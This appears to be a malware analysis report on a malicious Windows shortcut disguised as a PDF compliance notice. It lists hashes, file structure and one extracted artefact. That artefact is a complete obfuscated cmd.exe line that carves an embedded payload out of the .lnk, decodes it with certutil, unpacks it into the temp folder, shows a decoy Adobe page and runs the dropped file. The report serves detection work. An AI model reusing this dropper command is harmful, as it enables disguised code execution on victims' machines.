Malicious
Malicious
Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
701a15d5a597b7ae8154e1e8c008df8f
Sha1
febfc8200c4619637835b4153835e01bc57c6d74
Sha256
6b8adb3486ba8345507f380546edbe73902f81bdf39d542e1a3bb3d2bd3df7e9
Sha384
0cea8d3b5c340267bda7dc31b585ec7a639366f8baeba2e8bd90ee398109ce11bf5d83b6f52ae664d820b30f76714e23
Sha512
77ebc6f2fc3d86ae76c7bfe7683dd7184f8ad7765cdf45cedbce76ef16a3390711b9fd94c72f20726888e317f4aec989a2c879c72e9f0018be5d6ef62951d169
SSDeep
1536:WEyoQ8CAb0G67f7C/8HRic44H6BkDDNd0lOXOEN4q:W/Tu0n7fzic4xqVe8OEZ
TLSH
95B31B7F1872EF6FFA919579500C2D07DC2656E3A2334C1C592CEBE5A5E23043AE86E4
File Structure
701a15d5a597b7ae8154e1e8c008df8f
Malicious
[Base64-Block @0x00001212]
Overlay_86965987.bin
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rdata
.data
.rsrc
Resources
RT_ICON
ID:0066
ID:1033
RT_GROUP_CURSOR4
ID:0000
ID:1033
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

cmd.exe /V /c set w=l & set o=rt & set p=files & more Mandatory_Compliance_Notice.pdf.lnk +1510 > %temp%\setup.b64 & for!p! /s /p %temp% /m *Mandatory_Compliance_Notice.pdf.lnk* /C "cmd /c more +1510 @file > %temp%\setup.b64" & certuti!w! -decodehex %temp%\setup.b64 %temp%\setup.tar 1 & tar -xf %temp%\setup.tar -C %temp% & sta!o! iexplore https://www.adobe.com & %temp%\003553472.pdf
701a15d5a597b7ae8154e1e8c008df8f (111.81 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙